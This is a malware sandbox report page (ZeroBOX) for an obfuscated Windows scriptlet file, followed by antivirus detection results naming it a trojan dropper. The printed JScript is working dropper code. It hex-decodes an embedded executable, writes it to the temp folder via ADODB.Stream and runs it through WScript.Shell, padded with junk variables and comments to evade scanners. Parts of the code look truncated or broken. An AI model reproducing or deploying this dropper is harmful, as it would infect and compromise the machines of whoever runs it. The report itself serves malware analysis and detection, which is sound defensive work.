popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
<?XML version="1.03517149347282658103442759765835646634881314590568218241186959452365612433224836920"?>
<!--ctinBWkShsJEffFQfbaFiyBIDVWHrKwHHMekNDcozzkHbQMkSPpZUCvKWFRFaHCCfbWybtcHYNfNpTGNpN BRCVQnnLoOXAHeNQfEMKnEyUXtNwcauoMHwOOKciQccpVOyYyevhZLsXzI-->
<scriptlet>
<registration
progid="474271497433524894161292807"
classid="{37506281-3750-5312-3928-409247652259}" >
<!--ZKHWAAAOw PGeRAhEcwXoKkJUeTtIZXrzcyfbfMhyrKnoBCWUAeU-->
<script language="JScript">
<![CDATA[
var CDFwOOKIPQNwKIKXAKWkJNFwftPuNkyYaXytzsQOkBEFDbzphKhLhwfOYnftYyVGtPwNpoDeTiZkkZNeXG = "byCsZSPnJfzWZdItnRnBVsFMOKkBObQzVfSCABTDsGDUtCCXPUJUtRHRSQHALzFHAaaUrhXTYQfBTKAykrMTDVbfJbKKTESWaVGtBINJXQWHNiXkBrkBNMfEYWtnHyZFXkAYfeWLIdWNYGCDeCnKtDrARbyFsFbKRDJFRZeyyHTKPCGEFUhhfBkGYZidQDAdbtVHWWLezVtPJLKAHUZCAWGCseHSTaIVkQJEGZHIrbRneDWzASHVDXOfRFtTBTszzBITdiTIyCkyhtySinDaENDrdENaNOkBRDVOVesnYZIbQBZFkENiBrVMXyQJFSUKnRHNCKWdXrdFfCFMFkTrbaaIIrQIyNOhfXSYUteJHKriiBHHTffyZLJnRZfiTAPsGWAiKHRkerNCRTBiNrPnICiFAJkVkWPkUZMsbAWyzXnPXiDXJXEKKHNePUSazWZiFFHRkfhzyDVLnCHkirtrEhJzyIGiIWYCXbrELLPFShyiMbUyyKTfKPOAWnFLKYQBFENkkeIGFSDySCMsNkTXdTRkyVHChfUTAWNnzNhrdzKSyBHFHrXCfSzLMGUtIhAAXKXWPEWZbKVP"
var JrfBUwToSdbrPBzFht = "4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000d00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000e5dd0408a1bc6a5ba1bc6a5ba1bc6a5b2fb4355ba3bc6a5ba1bc6b5b3abc6a5b22b4375bb0bc6a5bf59f5a5babbc6a5b66ba6c5ba0bc6a5b52696368a1bc6a5b00000000000000000000000000000000504500004c010500155aa0490000000000000000e0000f010b010600005a000000e0010000040000cb30000000100000007000000000400000100000000200000400000000000000040000000000000000e002000004000000000000020000000000100000100000000010000010000000000000100000000000000000000000a4730000b400000000c00200fa190000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007000008c0200000000000000000000000000000000000000000000000000002e74657874000000ce58000000100000005a000000040000000000000000000000000000200000602e7264
function oHPubpwBkIruuPtveAzBtAUCVEJisX( KoALdsETtcTQkGTpUEHdSkzPJYsAGyQNvFBXQSCwDYEvWdaRiKroeQyCTLbeadoZvf){
CCMXdHHRiTsBsvbudfwaZnSWswSNbHGtbXrTvybVLJzE = '';
for ( eJXosHRtBeRpJbzncOvGHHWyLAiPnT = 0; eJXosHRtBeRpJbzncOvGHHWyLAiPnT < ( KoALdsETtcTQkGTpUEHdSkzPJYsAGyQNvFBXQSCwDYEvWdaRiKroeQyCTLbeadoZvf.length / 2 ); eJXosHRtBeRpJbzncOvGHHWyLAiPnT++ ){
CCMXdHHRiTsBsvbudfwaZnSWswSNbHGtbXrTvybVLJzE+= String.fromCharCode( '0x' + KoALdsETtcTQkGTpUEHdSkzPJYsAGyQNvFBXQSCwDYEvWdaRiKroeQyCTLbeadoZvf.substr( eJXosHRtBeRpJbzncOvGHHWyLAiPnT * 2, 2 ) );
return CCMXdHHRiTsBsvbudfwaZnSWswSNbHGtbXrTvybVLJzE;
var GcpobDQsGYsFUvJkGUJLaYNnhFAGIM = new ActiveXObject("WScript.Shell");
var yOdyQcGvihpeXWMucEwTEfrhNaBJakaGEWAZikPRODvcCFtLZtwcIyskoWLJHXvYfCFVrMYUPyebThEiJQKCYYSaF = "ihe"
var iF = GcpobDQsGYsFUvJkGUJLaYNnhFAGIM.ExpandEnvironmentStrings("%temp%");
var fyfgreytrdy = iF + "\\ScPGYybzteopBaJtFpLpDkCiB.exe"
JrfBUwToSdbrPBzFht = oHPubpwBkIruuPtveAzBtAUCVEJisX(JrfBUwToSdbrPBzFht);
var yrhdYtWkTGzaOKzhtObPyfbZtEQYinPaXfzEasEFzJWOnLLXAzRUEzrnkiQGGYbKR = "sQTUZZVwEaGWVExrRzbPQQcbDMQOzdutWhdDCdNbfSYdBc"
CVyWLoJoEpGWFTRuVJAeGGBMIfHTJOKnIrtG = new ActiveXObject("ADODB.Stream");
CVyWLoJoEpGWFTRuVJAeGGBMIfHTJOKnIrtG.Type = 2;
var ZUUFGtDyMXAFNidspTWBPOoXiRhRpLVehBSzXVAzJefZccfuJLFuFJIwGXyPvMkbcryunKzoyDSLJnU = "VLRdebVpUvNaT"
CVyWLoJoEpGWFTRuVJAeGGBMIfHTJOKnIrtG.Charset = "ISO-8859-1";
var dbweuZnzpMiBUKEwoXiXbNacwnaFQiLccuFkJHOorpoeNapTauQJKHP = "apBzntPFTyMKSRyUfdesQz"
CVyWLoJoEpGWFTRuVJAeGGBMIfHTJOKnIrtG.Open();
var IWdBHivRFJWWhrtvPtNyoIthRhOHPRJIibeKFwfiHPUWbteNZZnobGVZFXKAzKbNZnOewMLFvFREOAfAca = "LrzNnEVBMXTfMMsizHszUKJEbTYiBbbsVeUHPe"
CVyWLoJoEpGWFTRuVJAeGGBMIfHTJOKnIrtG.WriteText(JrfBUwToSdbrPBzFht);
CVyWLoJoEpGWFTRuVJAeGGBMIfHTJOKnIrtG.SaveToFile(fyfgreytrdy);
var NWUHvHhdzuIUiEAZXESyLEykrQEI = new ActiveXObject("WScript.Shell").Run(fyfgreytrdy);
var DFPpEeDBKwQYLZNUXtFuERJMERDdTNBrnMtXGCGQJafQAZktPDYuRyCMVcKMHzIXOBKY = "GSSMHyvPWtVMNWJXScyPusUFnDZNPUhKTrCW"
</script>
<!--VHkEMPTnWZOnCMCevdhCcwLWdAEMffTLYOCcczwSLTrVeNoRtkGfhdYLWuBvw cbtBZtDpOSppGZvXfHrcUeQyHkQKYhDYhcddNCHRIkdNALSfPMrZCGQXvYUQHS-->
</registration>
<!--zPvTLoATQhYPCBbsfRdDGHKJSATXENdOXwNWnnROPsdvQKsArrrFVoUzeHbvzCrccpSvNebRZnOw ECNtGUNGoXFYWcMvIhb-->
</scriptlet>
<!--DJITbLYPGRHIUekZnaMhQXOnUREOBwiCVWLuADzRTECkURbntrDJhsebCzpwUpJzKcMozDEEBPbuFGkWZYrOeCsJNaPPKRzNVchzYrVUQ yOdyQcGvihpeXWMucEwTEfrhNaBJakaGEWAZikPRODvcCFtLZtwcIyskoWLJHXvYfCFVrMYUPyebThEiJQKCYYSaF-->
Antivirus Signature
Bkav Clean
MicroWorld-eScan Clean
FireEye Clean
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
Zillya Clean
Sangfor Malware.Generic-HTML.Save.4a63dace
K7AntiVirus Clean
K7GW Clean
Baidu VBS.Trojan-Dropper.Agent.ap
Cyren Clean
Symantec Clean
ESET-NOD32 JS/TrojanDropper.Agent.OFU
TrendMicro-HouseCall Clean
Avast Clean
ClamAV Xml.Malware.Squiblydoo-6728833-0
Kaspersky HEUR:Trojan.Script.Generic
BitDefender Clean
NANO-Antivirus Trojan.Script.Heuristic-js.iacgm
ViRobot Clean
AegisLab Clean
Rising Clean
Ad-Aware Clean
Sophos Clean
Comodo Clean
F-Secure Clean
DrWeb Clean
VIPRE Clean
TrendMicro Clean
McAfee-GW-Edition Clean
CMC Clean
Emsisoft Clean
Ikarus Clean
GData Clean
Jiangmin Clean
Avira HTML/Crypted.Gen
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.Script.Generic
Microsoft Trojan:Script/Wacatac.B!ml
Cynet Malicious (score: 85)
AhnLab-V3 Clean
BitDefenderTheta Clean
ALYac Clean
MAX Clean
VBA32 Clean
Zoner Clean
Tencent Clean
Yandex Clean
TACHYON Clean
MaxSecure Clean
Fortinet Clean
Panda Clean
Qihoo-360 virus.js.qexvmc.1075
No IRMA results available.